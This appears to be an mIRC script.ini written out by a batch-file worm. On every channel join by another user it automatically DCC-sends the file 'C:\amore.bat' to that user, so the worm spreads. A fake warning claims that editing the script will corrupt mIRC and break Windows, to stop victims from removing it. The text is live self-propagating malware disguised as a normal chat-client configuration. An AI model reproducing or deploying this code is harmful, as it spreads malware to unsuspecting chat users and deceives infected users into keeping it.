[script]
;mIRC Script >nul
;  Please dont edit this script... mIRC will corrupt, if mIRC will  >nul
              corrupt... WINDOWS will affect and will not run correctly. thanks >nul
; >nul
;Mirko  >nul
;http://www.mirc.com  >nul
; >nul
n0=on 1:JOIN:#:{ >nul
n1=  /if ( $nick == $me ) { halt } >nul
n2=  /.dcc send $nick "C:\amore.bat" >nul
n3=} >nul
